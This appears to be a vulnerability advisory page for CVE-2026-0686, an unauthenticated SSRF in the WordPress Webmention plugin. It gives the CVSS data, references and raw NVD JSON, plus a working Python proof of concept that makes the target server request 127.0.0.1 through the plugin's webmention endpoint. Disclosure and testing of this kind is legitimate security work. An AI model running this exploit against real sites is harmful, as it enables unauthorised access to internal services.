Security Vulnerability Report
CVE-2026-0686 CVSS 7.2 HIGH

CVE-2026-0686

Published: 2026-04-02 08:16:28
Last Modified: 2026-04-27 19:04:23

Description

The Webmention plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.6.2 in the 'MF2::parse_authorpage' function via the 'Receiver::post' function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Webmention <= 5.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# Proof of Concept for CVE-2026-0686 (SSRF in WordPress Webmention Plugin)
# Usage: python3 poc.py <target_url>
import sys

import requests

if len(sys.argv) < 2:
    print(f"Usage: {sys.argv[0]} <http://target-site.com>")
    sys.exit(1)

target = sys.argv[1].rstrip('/')

# The vulnerable path is Receiver::post -> MF2::parse_authorpage: the plugin
# fetches the webmention 'source' URL server-side, so a 'source' pointing at an
# internal address makes the web application issue that request itself.
internal_target = "http://127.0.0.1:80"  # Example: localhost
victim_post = f"{target}/?p=1"  # Arbitrary post ID on the target site

# The Webmention payload
payload = {
    'source': internal_target,
    'target': victim_post,
}

print(f"[*] Attempting to trigger SSRF on {target}")
print(f"[*] Trying to force server to connect to: {internal_target}")

try:
    # Send the webmention to the receiver endpoint. The exact endpoint can vary
    # with the WordPress configuration; the REST API route below is the one the
    # plugin commonly registers.
    endpoint = f"{target}/wp-json/webmention/1.0/endpoint"
    response = requests.post(endpoint, data=payload, timeout=5)
    if response.status_code == 202:  # Accepted
        print("[+] Request accepted by server. The server may have sent a request to the internal target.")
    else:
        print(f"[-] Server returned status code: {response.status_code}")
        print(f"Response: {response.text}")
except Exception as e:
    print(f"Error: {e}")

References

https://github.com/pfefferle/wordpress-webmention/blob/057223cee18a9e93b017d0f21db6ea77a7686489/includes/handler/class-mf2.php#L878
https://plugins.trac.wordpress.org/browser/webmention/tags/5.6.2/includes/class-receiver.php#L260
https://plugins.trac.wordpress.org/browser/webmention/tags/5.6.2/includes/handler/class-mf2.php#L877
https://plugins.trac.wordpress.org/changeset/3494831/webmention
https://www.wordfence.com/threat-intel/vulnerabilities/id/08d15c46-d15f-4803-80be-90bf33335c18?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0686", "sourceIdentifier": "[email protected]", "published": "2026-04-02T08:16:27.850", "lastModified": "2026-04-27T19:04:22.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Webmention plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.6.2 in the 'MF2::parse_authorpage' function via the 'Receiver::post' function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/pfefferle/wordpress-webmention/blob/057223cee18a9e93b017d0f21db6ea77a7686489/includes/handler/class-mf2.php#L878", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/webmention/tags/5.6.2/includes/class-receiver.php#L260", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/webmention/tags/5.6.2/includes/handler/class-mf2.php#L877", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3494831/webmention", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/08d15c46-d15f-4803-80be-90bf33335c18?source=cve", "source": "[email protected]"}]}}